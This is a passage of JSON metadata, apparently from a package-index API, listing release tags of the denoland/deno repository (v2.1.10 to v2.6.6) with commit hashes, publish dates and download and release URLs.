t":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecos